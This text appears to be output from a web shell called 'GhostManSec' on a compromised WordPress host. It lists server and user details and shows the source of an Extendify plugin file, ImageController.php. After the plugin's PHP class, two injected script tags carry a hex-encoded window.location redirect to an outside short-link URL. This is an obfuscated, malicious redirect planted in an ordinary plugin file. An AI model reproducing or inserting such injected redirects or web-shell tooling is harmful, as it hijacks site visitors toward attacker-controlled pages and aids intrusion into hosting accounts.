GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
$ pwd: /home/parhudrw/luca.anqa.it/wp-content/plugins/extendify/app/Draft/Controllers/
Upload Files
File: /home/parhudrw/luca.anqa.it/wp-content/plugins/extendify/app/Draft/Controllers/ImageController.php
<?php

/**
 * Image Controller
 */

namespace Extendify\Draft\Controllers;

defined('ABSPATH') || die('No direct access.');

// Try to execute set the limit to something that will work for 60s duration.
// phpcs:ignore WordPress.PHP.NoSilencedErrors, Generic.PHP.NoSilencedErrors.Discouraged
if (strpos(@ini_get('disable_functions'), 'set_time_limit') === false) {
    // phpcs:ignore WordPress.PHP.NoSilencedErrors, Generic.PHP.NoSilencedErrors.Discouraged
    @set_time_limit(60);
}

use Extendify\Shared\Services\Sanitizer;

/**
 * The controller for uploading images to the Media Library.
 */

class ImageController
{
    /**
     * Upload the provided image
     *
     * @param \WP_REST_Request $request - The request.
     * @return \WP_REST_Response
     */
    public static function uploadMedia(\WP_REST_Request $request)
    {
        if (! function_exists('\media_sideload_image')) {
            require_once ABSPATH . 'wp-admin/includes/media.php';
            require_once ABSPATH . 'wp-admin/includes/file.php';
            require_once ABSPATH . 'wp-admin/includes/image.php';
        }

        $imageId = \media_sideload_image($request->get_param('source'), 0, null, 'id');

        if ($request->get_param('alt_text')) {
            update_post_meta(
                $imageId,
                '_wp_attachment_image_alt',
                Sanitizer::sanitizeText($request->get_param('alt_text'))
            );
        }

        if ($request->get_param('caption')) {
            wp_update_post(
                Sanitizer::sanitizeArray([
                    'ID'           => $imageId,
                    'post_excerpt' => $request->get_param('caption'),
                ])
            );
        }

        $imageObject = \get_post($imageId);
        $altText = (get_post_meta($imageId, '_wp_attachment_image_alt', true))
            ? get_post_meta($imageId, '_wp_attachment_image_alt', true)
            : '';

        return new \WP_REST_Response(
            [
                'id'         => $imageId,
                'caption'    => ['raw' => $imageObject->post_excerpt],
                'source_url' => wp_get_attachment_url($imageId),
                'alt_text'   => $altText,
            ]
        );
    }
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
@ Telegram